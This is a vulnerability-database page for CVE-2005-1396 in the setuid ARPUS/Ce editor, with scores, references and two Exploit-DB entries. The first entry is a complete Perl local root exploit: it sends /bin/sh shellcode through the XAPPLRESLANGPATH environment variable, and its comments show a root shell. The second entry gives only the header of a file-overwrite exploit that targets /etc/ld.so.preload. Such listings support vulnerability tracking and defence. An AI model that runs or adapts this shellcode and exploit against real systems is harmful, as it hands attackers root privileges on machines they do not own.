CVE-2005-1396
Published 2005-05-03
Priority: P4 17 | Severity: low | Score: 1.2 (CVSS 2.0)
Vector: AV:L/AC:H/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 0.73% (49.6th percentile)
Race condition in Ce/Ceterm (aka ARPUS/Ce) 2.5.4 and earlier allows local users to write to arbitrary files via a symlink attack on the ce_edit_log temporary file.
No detection rules found.
Exploit-DB
ARPUS/Ce - Local Overflow (setuid)
exploitdb·2005-05-01
---
#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre)
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#
# 57 bytes long
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);
$ENV{"XAPPLRESLANGPATH"} = $buf;
exec("/usr/bin/ce");
# milw0rm.com [2005-05-01]
Exploit-DB
ARPUS/Ce - Local File Overwrite (setuid)
exploitdb·2005-05-01
---
/*
* Copyright Kevin Finisterre - ripped from my perl_ex.c
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severely fuck up your box (or someone else's).
* ** WARNING ** have a boot disk ready in case something goes wrong.
*
* Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
*
* kfinisterre@kfinisterre01:~$ ls -al /usr/bin/ce
* -rwsr-xr-x 1 root bin 630010 Sep 27 2004 /usr/bin/ce
*
* Tested against http://168.158.26.15/ce/ce-0260-intel-pentium-linux-fedoracore3.tar.gz
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033705.html
http://secunia.com/advisories/15197
http://securitytracker.com/id?1013855
http://www.digitalmunition.com/DMA%5B2005-0501a%5D.txt
http://www.osvdb.org/16050
2005-05-03
Published